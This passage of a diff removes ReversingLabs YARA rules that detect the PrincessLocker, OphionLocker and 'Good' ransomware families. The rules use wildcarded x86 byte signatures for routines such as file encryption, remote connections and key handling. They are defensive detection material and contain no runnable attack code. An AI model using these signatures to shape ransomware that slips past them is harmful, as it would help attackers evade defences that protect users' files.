-            7C CE 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ??
-            ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B C1 C1 E8 ?? 33 C8 8B C1 25 ?? ??
-            ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3
-        }
-		$entrypoint_all = {
-            83 EC ?? E8 ?? ?? ?? ?? 50 FF 15
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( $file_loop_1 and $encrypt_data_1 and $decrypt_data_1 and $decrypt_strings_1 and $decrypt_1 ) or ( $file_loop_2 and $encrypt_data_2 and $decrypt_data_2 and $decrypt_strings_2 and $decrypt_2 ) or ( $file_loop_3 and $encrypt_data_3 and $decrypt_data_3 and $decrypt_3 ) ) and ( $entrypoint_all at pe.entry_point ) )
-}
-rule REVERSINGLABS_Win32_Ransomware_Princesslocker : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects PrincessLocker ransomware."
-		author = "ReversingLabs"
-		id = "b76ef137-aa0b-5fd3-9876-2459cb6535ff"
-		date = "2020-06-26"
-		modified = "2020-07-15"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.PrincessLocker.yara#L1-L92"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5be4ca3bd0b0afed1d2f3a59e2951d74a8de94c5a4d5a2c6cc29add49eab9ec0"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "PrincessLocker"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$encrypt_files = {
-            6A ?? 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45
-            ?? 50 53 FF D7 6A ?? FF B5 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ??
-            FF B5 ?? ?? ?? ?? FF D6 85 C0 75 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            85 C0 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
-            8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 53 FF D7 68 ?? ?? ??
-            ?? 8D 4D ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 89 9D ?? ?? ?? ?? 85 DB 75 ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? A1 ?? ??
-            ?? ?? 8B 30 89 B5 ?? ?? ?? ?? 3B F0 0F 84 ?? ?? ?? ?? 33 C9 C6 45 ?? ?? 6A ?? 51 8D
-            46 ?? 66 89 8D ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ??
-            ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ??
-            66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 FF 75 ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? C6 45 ?? ?? 8B CC
-            33 C0 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 50 66 89 01 8D 85 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ??
-            C3 C7 45 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6
-            45 ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ??
-            68 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D BD ?? ??
-            ?? ?? 6A ?? 6A ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 83 BD
-            ?? ?? ?? ?? ?? 6A ?? 0F 43 BD ?? ?? ?? ?? 6A ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 85 DB 0F 84 ?? ??
-            ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 8B F8 83 FF
-            ?? 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 6A ?? 8D 85 ?? ??
-            ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 85
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 48 39 85 ?? ?? ?? ?? B8 ?? ?? ?? ??
-            0F B6 C9 0F 46 C8 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 0F B6 C1 6A ?? 50 6A ?? FF
-            B5 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 FF 15
-        }
-		$remote_connection_1 = {
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 84 DB 0F 85 ?? ?? ??
-            ?? 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? C7 45 ?? ??
-            ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8B F0 8D 55 ?? C6 45 ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 56 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8
-        }
-		$remote_connection_2 = {
-            BA ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 66 C7 45 ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 55 ?? C6 45
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 BA ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56
-            8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 8B D0 C6 45 ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 53 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ??
-            ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 50 E8
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and $encrypt_files and $remote_connection_1 and $remote_connection_2
-}
-rule REVERSINGLABS_Win32_Ransomware_Ophionlocker : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects OphionLocker ransomware."
-		author = "ReversingLabs"
-		id = "75335749-66bd-539e-92b3-dd92c0b332d8"
-		date = "2020-06-26"
-		modified = "2020-07-15"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.OphionLocker.yara#L1-L105"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3c54a948a6a45ec5f5bc32fbbdbc8822f402b1332e9109b20b90635464dbe2ac"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "OphionLocker"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$ol_do_filetypes_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 57 33 DB 53 89 5D ?? 53 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 89 45 ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-        }
-		$ol_do_filetypes_2 = {
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? FF 75 ?? 8D 4D ?? 89 5D ?? 50
-            8D 85 ?? ?? ?? ?? 89 5D ?? 50 53 89 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8
-            ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 89 65 ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 8D 75 ?? 50 E8 ?? ??
-            ?? ?? 8B CE C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 58 89 45 ?? 89 5D ?? 88 5D ?? 89 45 ?? 89
-            5D ?? 88 5D ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 8B 39 E9 00 01 00 00 8B 77 ??
-            8D 47 ?? 89 45 ?? 3B 77 ?? 0F 84 EC 00 00 00 8B F8 68 ?? ?? ?? ?? 8B D7 8D 4D ?? E8 ?? ?? ?? ?? 56 8B D0 C6 45 ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 50 8D 4D ?? E8 ?? ?? ?? ?? 53 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 6A ?? 8D 4D
-        }
-		$ol_do_filetypes_3 = {
-            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ??
-            89 65 ?? 8D 45 ?? 83 EC ?? 8B CC 50 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
-            81 C4 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 53 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 89 65 ?? 50 E8 ??
-            ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 83 C4 ?? 3B 77 ?? 0F
-            85 1C FF FF FF 8B 4D ?? 8B 7D ?? 8B 3F 89 7D ?? 3B F9 0F 85 F5 FE FF FF 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45
-            ?? ?? 8D 85 ?? ?? ?? ?? 89 65 ?? 8B CC BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC E8 ?? ?? ?? ?? C6 45
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B
-            CC E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 33 F6 8D 8D
-            ?? ?? ?? ?? 53 46 56 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 53 56 8D 4D ?? E8 ?? ?? ?? ?? 53 56 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 53 56 8D 4D ?? E8 ?? ??
-            ?? ?? 8B 4D ?? 5F 5E 64 89 0D ?? ?? ?? ?? 5B 8B E5 5D C3
-        }
-		$ol_ecies_key_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 57 8B F9 33 DB 89 5D ?? 8D 8D ?? ?? ?? ?? 89 7D ?? 89 5D ?? E8 ??
-            ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 46 8D 8D ?? ?? ?? ?? 50 BA ?? ?? ?? ?? 89 75 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B
-            CC 8B D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 56 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ??
-            ?? ?? BE ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 50 56 FF 75 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 85 C0 0F 85 40 03 00 00 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 51
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B B4 05 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 50 8B 85 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8 FF 56 ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 53 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? BB ??
-            ?? ?? ?? 8D 4D ?? 53 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 83 7D ?? ?? 8D 4D ?? 8B F0
-            0F 43 4D ?? 51 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 95 ?? ?? ?? ?? 8B 06 52 8B 48 ?? 03 CE 8B 01 FF 50 ??
-            C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 0D 8B 01 6A ?? 8B 40 ?? 03 C8 8B 01 FF 10 33 F6 C6 45 ?? ?? 56 6A ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 83 EC ?? 8B CC 53 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
-        }
-		$ol_ecies_key_2 = {
-            56 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 53
-            E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45
-            ?? ?? 50 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 59 50 8D 4D ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ??
-            56 E8 ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56
-            E8 ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 33 F6 C6 45 ?? ?? 56 50 8D 4D ?? E8 ?? ??
-            ?? ?? 56 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 95 ?? ?? ?? ?? 8B CC 89 65 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 53 E8 ??
-            ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ??
-            56 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-        }
-		$ol_ecies_key_3 = {
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? EB 30 83 EC ?? 8D 55 ?? 8B CC 89 65 ?? E8
-            ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC BB ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 51 8D 4F ??
-            E8 ?? ?? ?? ?? 8D 77 ?? C7 07 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 53 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 46 ?? C6 45 ?? ?? 85 C0 74 05 8D 4E ?? EB 02 33 C9 8D 55 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 8B 06 8B CE FF 50 ?? 6A ?? 68 ?? ?? ?? ?? 8B 08 8B 49 ?? 03 C8 8B 01 FF 50 ?? 53 E8 ?? ?? ?? ?? 59 6A ??
-            6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B C7 5F 5E 64 89 0D ?? ?? ?? ?? 5B
-            8B E5 5D C3
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $ol_do_filetypes_1 and $ol_do_filetypes_2 and $ol_do_filetypes_3 ) and ( $ol_ecies_key_1 and $ol_ecies_key_2 and $ol_ecies_key_3 ) )
-}
-rule REVERSINGLABS_Win32_Ransomware_Good : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects Good ransomware."
-		author = "ReversingLabs"
-		id = "e0f97200-7fe9-5811-b6cd-708ecc3a2fbc"
-		date = "2020-06-26"
-		modified = "2020-07-15"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Good.yara#L1-L82"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6737853a77a6008f9fd2141bb6b13d595f1cb7e832be944596f709e1fcdf8003"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Good"
-		tc_detection_factor = 5
